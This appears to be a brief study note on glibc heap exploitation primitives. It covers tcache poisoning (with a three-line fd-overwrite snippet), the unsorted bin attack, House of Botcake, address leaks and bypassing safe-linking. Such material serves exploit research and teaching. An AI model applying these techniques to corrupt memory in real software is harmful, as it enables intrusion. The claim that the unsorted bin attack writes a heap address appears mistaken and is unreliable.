Heap Exploitation Primitives

A structured overview of the core primitives used in glibc heap exploitation.

Overview

Modern heap exploitation relies on a small set of repeatable primitives. Understanding them as isolated building blocks makes it easier to chain them into full exploits.

Primitives

Arbitrary Write

The ability to write a controlled value to an arbitrary address. Often achieved via:

• unsorted bin attack — overwrites a target with a large heap address
• tcache poisoning — corrupts the fd pointer of a free chunk to redirect malloc to an attacker-controlled address
• House of Botcake — combines tcache and unsorted bin to bypass safe-linking

// tcache poisoning (glibc < 2.32, no safe-linking)
chunk_A->fd = target_addr;
malloc(size); // returns chunk_A
malloc(size); // returns target_addr

Arbitrary Read

Reading memory at an arbitrary address. Useful for leaking:

• libc base from unsorted bin pointers
• PIE base from heap pointers
• stack addresses from environ

Allocation Primitive

Forcing malloc to return a specific address. This is the end goal of most write primitives above.

Safe-Linking (glibc ≥ 2.32)

Since 2.32, tcache and fastbin fd pointers are mangled:

stored = (addr >> 12) ^ next

To bypass, you need a heap leak to reconstruct the key before poisoning.

References

• malloc.c source, glibc 2.35
• how2heap